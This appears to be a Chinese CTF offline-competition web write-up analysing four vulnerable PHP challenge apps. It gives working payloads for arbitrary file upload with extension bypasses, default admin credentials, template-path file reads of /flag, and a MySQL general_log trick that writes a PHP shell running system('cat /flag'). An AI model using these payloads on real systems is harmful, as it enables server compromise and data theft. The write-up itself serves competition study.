赛制

给每个参赛队伍所有题目的gamebox,参赛队伍在开赛时就能获取到所有题目的源码,可以选择先防御后攻击或先攻击后防御,只要拿到gamebox上的flag,机器人就会自动帮你攻击场上所有未防御选手的gamebox从而获取到分数。

粤湾基金

漏洞点:

  • 前台任意文件上传
  • 后台任意文件上传
  • 后台弱口令

前台任意文件上传 #1

漏洞文件:/application/home/controller/Test.php

漏洞方法:dlfile()

public function dlfile($file_url, $save_to)

{

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_POST, 0);

        curl_setopt($ch,CURLOPT_URL,$file_url);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

        $file_content = curl_exec($ch);

        curl_close($ch);

        $downloaded_file = fopen($save_to, 'w');

        fwrite($downloaded_file, $file_content);

        fclose($downloaded_file);

}

函数功能:

使用curl获取页面信息,并将其存储到本地文件中。

此处的file_url以及save_to均可控,所以可以直接getshell或者获取flag,主办方甚至贴心的给了利用方法:

前台任意文件上传 #2

漏洞文件:application/home/controller/Uploadify.php

漏洞方法:preview()

public function preview(){

        // 此页面用来协助 IE6/7 预览图片,因为 IE 6/7 不支持 base64

        $DIR = 'preview';

        // Create target dir

        if (!file_exists($DIR)) {

            @mkdir($DIR);

        }

        $cleanupTargetDir = true; // Remove old files

        $maxFileAge = 5 * 3600; // Temp file age in seconds

        if ($cleanupTargetDir) {

            if (!is_dir($DIR) || !$dir = opendir($DIR)) {

                die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "Failed to open temp directory."}, "id" : "id"}');

            }

            while (($file = readdir($dir)) !== false) {

                $tmpfilePath = $DIR . DIRECTORY_SEPARATOR . $file;

                // Remove temp file if it is older than the max age and is not the current file

                if (@filemtime($tmpfilePath) < time() - $maxFileAge) {

                    @unlink($tmpfilePath);

                }

            }

            closedir($dir);

        }

        $src = file_get_contents('php://input');

        if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) {

            $previewUrl = sprintf(

                    "%s://%s%s",

                    isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http',

                    $_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']

            );

            $previewUrl = str_replace("preview.php", "", $previewUrl);

            $base64 = $matches[2];

            $type = $matches[1];

            if ($type === 'jpeg') {

                $type = 'jpg';

            }

            if(strtolower($type)=='php'){

                die('hacked!');

            }

            $filename = md5($base64).".$type";

            $filePath = $DIR.DIRECTORY_SEPARATOR.$filename;

            if (file_exists($filePath)) {

                die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');

            } else {

                $data = base64_decode($base64);

                file_put_contents($filePath, $data);

                die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');

            }

        } else {

            die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "un recoginized source"}}');

        }

    }

函数功能:

提取正则中的base64编码的图片信息以及图片后缀,转存图片到本地。

漏洞点:

preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)

$base64 = $matches[2];

$type = $matches[1];

if ($type === 'jpeg') {

    $type = 'jpg';

}

if(strtolower($type)=='php'){

       die('hacked!');

}

$filename = md5($base64).".$type";

$filePath = $DIR.DIRECTORY_SEPARATOR.$filename;

if (file_exists($filePath)) {

    die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');

} else {

    $data = base64_decode($base64);

    file_put_contents($filePath, $data);

    die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');

}

这里的type以及base64均为我们可控的,而这里只是简单的限制了上传的后缀不能为php,我们可以尝试上传php4、php5、phtml、.user.ini、.htaccess来绕过。

后台弱口令

user:admin
pass:admin123

后台任意文件上传

漏洞文件:application/admin/controller/Uploadify.php

漏洞函数:preview()

public function preview(){

        // 此页面用来协助 IE6/7 预览图片,因为 IE 6/7 不支持 base64

        $DIR = 'preview';

        // Create target dir

        if (!file_exists($DIR)) {

            @mkdir($DIR);

        }

        $cleanupTargetDir = true; // Remove old files

        $maxFileAge = 5 * 3600; // Temp file age in seconds

        if ($cleanupTargetDir) {

            if (!is_dir($DIR) || !$dir = opendir($DIR)) {

                die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "Failed to open temp directory."}, "id" : "id"}');

            }

            while (($file = readdir($dir)) !== false) {

                $tmpfilePath = $DIR . DIRECTORY_SEPARATOR . $file;

                // Remove temp file if it is older than the max age and is not the current file

                if (@filemtime($tmpfilePath) < time() - $maxFileAge) {

                    @unlink($tmpfilePath);

                }

            }

            closedir($dir);

        }

        $src = file_get_contents('php://input');

        if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) {

            $previewUrl = sprintf(

                "%s://%s%s",

                isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http',

                $_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']

            );

            $previewUrl = str_replace("preview.php", "", $previewUrl);

            $base64 = $matches[2];

            $type = $matches[1];

            if ($type === 'jpeg') {

                $type = 'jpg';

            }

            $filename = md5($base64).".$type";

            $filePath = $DIR.DIRECTORY_SEPARATOR.$filename;

            if (file_exists($filePath)) {

                die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');

            } else {

                $data = base64_decode($base64);

                file_put_contents($filePath, $data);

                die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');

            }

        } else {

            die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "un recoginized source"}}');

        }

    }

}

和前台的一样,base64和type都可以控制,而且这里没有任何黑名单,可以直接控制后缀为php上传一个马。

格式:

data:image/php;base64,baseencode(yijuhua)

粤湾期货

漏洞点:

  • 重装系统
  • 后台任意文件上传

重装系统

漏洞文件:install.php

install.php中没有判断是否存在锁文件,导致可以任意重装。

这里不能用配置文件来getshell,因为用了addslashes函数来转义了引号,但是这里可以用来重置后台密码。

后台任意文件上传

在后台-系统设置中,可以设置允许上传的后缀,php被过滤了,可以直接用phtml来getshell,也可以用.user.ini来getshell。

粤湾投资

漏洞点:

  • 日志泄漏
  • 前台任意文件读取

日志泄漏

漏洞文件:Apps/Runtime/Logs/Home/19_11_20.log

打开进去可以直接看到主办方直接测试用的payload:

直接用这个payload就能读到flag。

前台任意文件读取

漏洞文件:Apps/Home/Controller/JqueryController.class.php

漏洞函数:index()

public function index(){

        if(!isset($_GET['template_file'])) {

            $this->seoData = array('title' => 'Jquery插件', 'keywords' => 'Jquery插件', 'description' => 'Jquery插件');

            $this->display();

        }

        else{

            $this->display($_GET['template_file']);

        }

    }

}

直接将我们传递到template_file代入进display方法中,跟进:

protected function display($templateFile='',$charset='',$contentType='',$content='',$prefix='') {

    $this->view->display($templateFile,$charset,$contentType,$content,$prefix);

}

将$templateFile代入了view-display()中,跟进:

public function display($templateFile='',$charset='',$contentType='',$content='',$prefix='') {

    G('viewStartTime');

    // 视图开始标签

    Hook::listen('view_begin',$templateFile);

    // 解析并获取模板内容

    $content = $this->fetch($templateFile,$content,$prefix);

    // 输出模板内容

    $this->render($content,$charset,$contentType);

    // 视图结束标签

    Hook::listen('view_end');

}

这里除了$templateFile,其余传递参数都为空,这里将templateFile传递进了fetch()方法,跟进:

于此处输出了模板文件:

payload:

index.php/Jquery/?template_file=/flag

粤湾租赁

漏洞点:

  • 后台弱口令
  • 后台任意SQL语句执行Getshell

后台弱口令

user:admin
pass:admin123

后台任意SQL语句执行Getshell

过滤了INTO OUTFILE不能直接写shell,使用写日志的方式进行写shell。

首先查看日志:

SHOW VARIABLES LIKE 'general%'

再设置日志文件并打开日志记录:

set global general_log = "ON";

set global general_log_file='/var/www/html/xxx.php';

这里卡了一会,直接写到一个不存在的文件里会500,所以只能尝试写日志进已存在的文件。

获取flag:

select '<?php system("cat /flag");'

进入日志页面后全局搜flag即可获取flag。

还有一个比较简单的方法:

select load_file("/flag");

当时在比赛的时候没想到,该payload没测试过,不知道是否被过滤。

Redhat 线下赛 WEB WP的更多相关文章

  1. ogeek线下赛web分析1-python-web

    1.python from flask import Flask, request, render_template,send_from_directory, make_response from A ...

  2. CTF线下赛AWD模式下的生存技巧

    作者:Veneno@Nu1L 稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 原文:https://www.anquanke.com/post/id/8467 ...

  3. CTF线下赛AWD套路小结

    近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一. AWD模式简介 AWD:Attack With Defence,比赛中每个队伍维护多台服务 ...

  4. 2021江西省赛线下赛赛后总结(Crypto)

    2021江西省赛线下赛 crypto1 题目: from random import randint from gmpy2 import * from Crypto.Util.number impor ...

  5. 2017第二届广东省强网杯线上赛:WEB phone number (SQL注入)

    目录 解题思路 总结 解题思路 拿到题目的时候,只有一个登录界面 拿到登录界面,而且还伴随着有注册界面,联想到SQL的二次注入漏洞 尝试注册admin'#,并使用admin登录,发现登录失败,说明可能 ...

  6. 2017年第二届广东省强网杯线上赛WEB:Musee de X writeup(模板注入漏洞)

    目录 解题思路 总结 解题思路 拿到手上,有四个页面 首先按照题目要求执行,尝试注册一个名为admin的账户 这种情况,路径都给出来了,很可能就是目录遍历或者文件上传了 回到初始界面,点击链接here ...

  7. 某团队线下赛AWD writeup&Beescms_V4.0代码审计

    还是跟上篇一样.拿别人比赛的来玩一下.  0x01 预留后门 连接方式: 0x02 后台登录口SQL注入 admin/login.php 在func.php当中找到定义的check_login函数 很 ...

  8. 某线下赛AWD

    拿别人比赛的来玩一下,或许这就是菜的力量吧. 0x01 任意文件读取: switch ($row['media_type']) { case 0: // 图片广告 ...... break; case ...

  9. 虎符2021线下赛pwn writeup

    jdt 一个图书管理系统,但并不是常规的堆题.edit和show函数可以越界.edit函数和show函数相互配合泄露libc基地址,将main函数的返回地址覆盖成onegadgets拿shell. f ...

随机推荐

  1. 通过virt-manager给Windowsxp系统配置virtio驱动

    在虚拟机的detail上添加一个硬件设备. 下载virtio.iso文件,我使用的版本126,具体的virtio驱动放到了10.2上的itest的目录中,使用可以找. 在配置中,添加virtio硬盘. ...

  2. Acwing 843. n-皇后问题

    n-皇后问题是指将 n 个皇后放在 n∗n 的国际象棋棋盘上,使得皇后不能相互攻击到,即任意两个皇后都不能处于同一行.同一列或同一斜线上. 现在给定整数n,请你输出所有的满足条件的棋子摆法. 输入格式 ...

  3. 两种HTTP请求方法:GET和POST的区别

    之前在一些开发者平台使用网页调用API时,一再提到两种请求方法GET和POST,所以就去了解了下.那么这又不得不提到HTTP了! 一.什么是 HTTP? 超文本传输协议(HTTP)的设计目的是保证客户 ...

  4. 如何安装与配置MySQL

    关键词:MySQL,安装,配置 这一节,我们讨论一下MySQL的安装配置与卸载 下载 网址:https://dev.mysql.com/downloads/mysql/ 选择社区版,找到对应的电脑,开 ...

  5. Go技术日报(2020-02-28)

    go 语言中文网(每日资讯)_2020-02-28 一.Go 语言中文网 Gopher 学习效率低怎么办?曹大谈工程师应该怎么学习 Go 的 http 包中默认路由匹配规则 [每日一库]Web 表单验 ...

  6. CentOS 7下Apache + PHP + MySQL环境(LAMP)的安装

    Step 1:更换阿里云 yum 源 curl -o /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7 ...

  7. VUE中登录密码显示与隐藏的最简设计——基于iview

    目录 VUE中登录密码显示与隐藏的最简设计--基于iview 1.背景 2.实现最终效果 2.1 隐藏密码 2.2 显示密码 3.实现思路 3.1 v-if判断当前密码显示状态 3.2 密码隐藏状态 ...

  8. 这些Zepto中实用的方法集

    前言 时间过得可真快,转眼间2017年已去大半有余,你就说吓不吓人,这一年你成长了多少,是否荒度了很多时光,亦或者天天向上,收获满满.今天主要写一些看Zepto基础模块时,比较实用的部分内部方法,在我 ...

  9. Yuchuan_Linux_C 编程之三 静态库的制作和使用

    一.整体大纲 二.静态库的制作 1)命名规则        lib + 库的名字 + .a        例如:libyuchuan.a2)制作步骤:        1). 生成对应的.o文件 -- ...

  10. SpringBoot1.5.10.RELEASE配置mybatis的逆向工程

    在application.properties配置扫描等,不做多说 1.在pom配置文件中引入mybatis和mysql的依赖,如下: <dependency> <groupId&g ...